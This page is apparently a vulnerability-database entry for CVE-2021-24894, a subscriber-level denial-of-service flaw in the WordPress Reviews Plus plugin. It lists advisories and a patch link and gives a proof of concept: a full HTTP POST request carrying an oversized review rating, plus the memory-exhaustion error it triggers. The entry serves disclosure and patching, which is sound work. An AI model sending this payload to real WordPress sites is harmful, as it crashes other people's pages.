Reviews Plus < 1.2.14 Subscriber+ DoS exploi
Reporter | Title | Published | Views | Family All 6 |
---|---|---|---|---|
Cvelist | CVE-2021-24894 Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS | 23 Nov 202119:16 | – | cvelist |
Patchstack | WordPress Reviews Plus plugin <= 1.2.13 - Reviews Denial of Service (DoS) vulnerability | 25 Oct 202100:00 | – | patchstack |
WPVulnDB | Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS | 25 Oct 202100:00 | – | wpvulndb |
NVD | CVE-2021-24894 | 23 Nov 202120:15 | – | nvd |
Prion | Design/Logic Flaw | 23 Nov 202120:15 | – | prion |
CVE | CVE-2021-24894 | 23 Nov 202120:15 | – | cve |
Source | Link |
---|---|
plugins | www.plugins.trac.wordpress.org/changeset/2618234 |
Enable reviews for post/pages, and enable the "Show Reviews on" setting for All posts or pages as well.
Then log in as a user such as subscriber and submit a review with a long rating, e.g
POST /wp-comments-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1
comment_type=ic_rev_post&review_type=ic_rev_post&ic_review_rating=100000000000000000000000&ic_review_title=aa&comment=cerh&submit=Submit+Review&comment_post_ID=2123&comment_parent=0
The review section of the post/page will crash with an error like "Allowed memory size of 268435456 bytes exhausted (tried to allocate 249561152 bytes) in /var/www/wp-content/plugins/reviews-plus/functions/functions.php on line 76" when viewed
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo